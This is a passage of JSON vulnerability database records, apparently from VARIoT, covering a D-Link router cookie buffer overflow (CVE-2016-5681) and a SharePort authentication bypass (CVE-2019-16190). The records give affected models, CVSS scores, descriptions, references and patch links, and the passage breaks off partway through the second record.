"version": "1.11"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.00"
},
{
"model": "dir-850l firmare",
"scope": "lte",
"trust": 1.0,
"vendor": "d link",
"version": "2.07"
},
{
"model": "dir-885l",
"scope": "lte",
"trust": 1.0,
"vendor": "d link",
"version": "1.11"
},
{
"model": "dir-817l\\",
"scope": "lte",
"trust": 1.0,
"vendor": "d link",
"version": "jul.2016"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.03"
},
{
"model": "dir-890l",
"scope": "lte",
"trust": 1.0,
"vendor": "d link",
"version": "1.09"
},
{
"model": "dir-822",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "3.01"
},
{
"model": "dir-818l\\",
"scope": "lte",
"trust": 1.0,
"vendor": "d link",
"version": "2.05"
},
{
"model": "dir-823",
"scope": "lte",
"trust": 1.0,
"vendor": "d link",
"version": "1.00"
},
{
"model": "dir-880l",
"scope": "lte",
"trust": 1.0,
"vendor": "d link",
"version": "1.07"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-817l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. ax"
},
{
"model": "dir-818l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. ax"
},
{
"model": "dir-822",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. a1"
},
{
"model": "dir-822",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "official fw v3.01 (v3.01wwb02) earlier"
},
{
"model": "dir-823",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. a1"
},
{
"model": "dir-823",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "official fw v1.00 (v1.00wwb05) earlier"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. b1"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "official fw v2.07 (v2.07wwb05) earlier"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. b1"
},
{
"model": "dir-868l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "official fw v2.03 (v2.03wwb01) earlier"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. c1"
},
{
"model": "dir-868l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "official fw v3.00 (v3.00wwb01) earlier"
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. a1"
},
{
"model": "dir-880l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "official fw v1.07 (v1.07wwb08) earlier"
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. a1"
},
{
"model": "dir-885l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "official fw v1.11 (v1.11wwb07) earlier"
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev a1"
},
{
"model": "dir-890l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "official fw v1.09 (v1.09b14) earlier"
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "rev. a1"
},
{
"model": "dir-895l",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "official fw v1.11 (v1.11wwb04) earlier"
},
{
"model": "router",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.07"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "2.03"
},
{
"model": "dir-818l\\",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "2.05"
},
{
"model": "dir-817l\\",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "jul.2016"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "3.00"
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.11"
},
{
"model": "dir-850l firmare",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "2.07"
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.11"
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.09"
},
{
"model": "dir-823",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.00"
},
{
"model": "dir-895l a1",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dir-890l a1",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dir-885l a1",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dir-880l a1",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dir-868l b1",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dir-850l b1",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dir-823 a1",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dir-822 a1",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dir-818l",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dir-817l",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#332115"
},
{
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"db": "BID",
"id": "92427"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-243"
},
{
"db": "NVD",
"id": "CVE-2016-5681"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:d-link:dir-817l%28w%29",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-818l%28w%29",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-822",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-823",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-850l",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-868l",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-880l",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-885l",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-890l",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dir-895l",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-004310"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Romero.",
"sources": [
{
"db": "BID",
"id": "92427"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-243"
}
],
"trust": 0.9
},
"cve": "CVE-2016-5681",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2016-5681",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.3,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 6.3,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 8.6,
"id": "CVE-2016-5681",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "NOT DEFINED",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "MEDIUM",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2016-06383",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-94500",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2016-5681",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-5681",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-5681",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2016-5681",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-5681",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2016-06383",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201608-243",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-94500",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#332115"
},
{
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"db": "VULHUB",
"id": "VHN-94500"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-243"
},
{
"db": "NVD",
"id": "CVE-2016-5681"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link Multiple router products offered by have a stack-based buffer overflow vulnerability. Stack-based buffer overflow (CWE-121) - CVE-2016-5681 program cgibin There is a stack-based buffer overflow in the process of validating the session cookie contained in the function in. this function is, WAN Side interface 8181/tcp It is also used in the service that waits at. CWE-121: Stack-based Buffer Overflow https://cwe.mitre.org/data/definitions/121.htmlArbitrary code could be executed by processing a crafted request. D-LinkDIR-895L is a wireless router from D-Link. The following products and versions are affected: D-Link DIR-850L B1 Version 2.07 prior to 2.07WWB05, DIR-817 Ax, DIR-818LW Bx Version 2.05b03beta03 prior, DIR-822 C1 Version 3.01 prior to 3.01WWb02, DIR-823 A1 version 1.00 before 1.00WWb05, DIR-895L A1 version 1.11 before 1.11WWb04, DIR-890L A1 version 1.09 before 1.09b14, DIR-885L A1 version 1.11 before 1.11WWb07, DIR-880L A1 1.07 before 1.07WWb08 Version, version 2.03 before DIR-868L B1 2.03WWb01, version 3.00 before DIR-868L C1 3.00WWb01",
"sources": [
{
"db": "CERT/CC",
"id": "VU#332115"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"db": "BID",
"id": "92427"
},
{
"db": "VULHUB",
"id": "VHN-94500"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/332115",
"trust": 0.8,
"type": "poc"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#332115"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#332115",
"trust": 3.6
},
{
"db": "NVD",
"id": "CVE-2016-5681",
"trust": 3.4
},
{
"db": "BID",
"id": "92427",
"trust": 2.6
},
{
"db": "DLINK",
"id": "SAP10063",
"trust": 2.5
},
{
"db": "JVN",
"id": "JVNVU94906777",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004310",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201608-243",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-06383",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-94500",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#332115"
},
{
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"db": "VULHUB",
"id": "VHN-94500"
},
{
"db": "BID",
"id": "92427"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-243"
},
{
"db": "NVD",
"id": "CVE-2016-5681"
}
]
},
"id": "VAR-201608-0074",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"db": "VULHUB",
"id": "VHN-94500"
}
],
"trust": 1.3879464325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06383"
}
]
},
"last_update_date": "2024-11-23T22:34:49.123000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP10063:CVE-2016-5681 - VU#332115 - Some D-Link routers are vulnerable to buffer overflow exploit.",
"trust": 0.8,
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063"
},
{
"title": "Technical Support",
"trust": 0.8,
"url": "http://support.dlink.com/"
},
{
"title": "Patches for multiple D-LinkRouters stack buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/80487"
},
{
"title": "Multiple D-Link Routers Fixes for stack-based buffer overflow vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=63628"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-243"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94500"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"db": "NVD",
"id": "CVE-2016-5681"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.kb.cert.org/vuls/id/332115"
},
{
"trust": 2.5,
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10063"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/92427"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/121.html"
},
{
"trust": 0.8,
"url": "http://support.dlink.com/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5681"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu94906777"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5681"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#332115"
},
{
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"db": "VULHUB",
"id": "VHN-94500"
},
{
"db": "BID",
"id": "92427"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-243"
},
{
"db": "NVD",
"id": "CVE-2016-5681"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#332115"
},
{
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"db": "VULHUB",
"id": "VHN-94500"
},
{
"db": "BID",
"id": "92427"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-243"
},
{
"db": "NVD",
"id": "CVE-2016-5681"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-11T00:00:00",
"db": "CERT/CC",
"id": "VU#332115"
},
{
"date": "2016-08-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"date": "2016-08-25T00:00:00",
"db": "VULHUB",
"id": "VHN-94500"
},
{
"date": "2016-08-11T00:00:00",
"db": "BID",
"id": "92427"
},
{
"date": "2016-08-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"date": "2016-08-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-243"
},
{
"date": "2016-08-25T21:59:04.150000",
"db": "NVD",
"id": "CVE-2016-5681"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-12T00:00:00",
"db": "CERT/CC",
"id": "VU#332115"
},
{
"date": "2016-08-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06383"
},
{
"date": "2016-11-28T00:00:00",
"db": "VULHUB",
"id": "VHN-94500"
},
{
"date": "2016-08-11T00:00:00",
"db": "BID",
"id": "92427"
},
{
"date": "2016-08-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-004310"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-243"
},
{
"date": "2024-11-21T02:54:48.910000",
"db": "NVD",
"id": "CVE-2016-5681"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201608-243"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link routers contain buffer overflow vulnerability",
"sources": [
{
"db": "CERT/CC",
"id": "VU#332115"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201608-243"
}
],
"trust": 0.6
}
}
var-201909-0587
Vulnerability from variot
SharePort Web Access on D-Link DIR-868L REVB through 2.03, DIR-885L REVA through 1.20, and DIR-895L REVA through 1.21 devices allows Authentication Bypass, as demonstrated by a direct request to folder_view.php or category_view.php. D-Link DIR-868L REVB , DIR-885L REVA , DIR-895L REVA Devices have authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DIR-868L REVB and so on are all wireless routers from Taiwan D-Link.
There are security vulnerabilities in SharePort Web Access in D-Link DIR-868L REVB 2.03 and earlier, DIR-885L REVA 1.20 and earlier, and DIR-895L REVA 1.21 and earlier. An attacker could use this vulnerability to bypass authentication
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201909-0587",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-895l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.21"
},
{
"model": "dir-885l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.20"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.03"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "2.03"
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.20"
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.21"
},
{
"model": "dir-868l revb",
"scope": "lte",
"trust": 0.6,
"vendor": "d link",
"version": "\u003c=2.03"
},
{
"model": "dir-885l reva",
"scope": "lte",
"trust": 0.6,
"vendor": "d link",
"version": "\u003c=1.20"
},
{
"model": "dir-895l reva",
"scope": "lte",
"trust": 0.6,
"vendor": "d link",
"version": "\u003c=1.21"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39556"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
},
{
"db": "NVD",
"id": "CVE-2019-16190"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-885l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-895l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
}
]
},
"cve": "CVE-2019-16190",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-16190",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-39556",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-16190",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
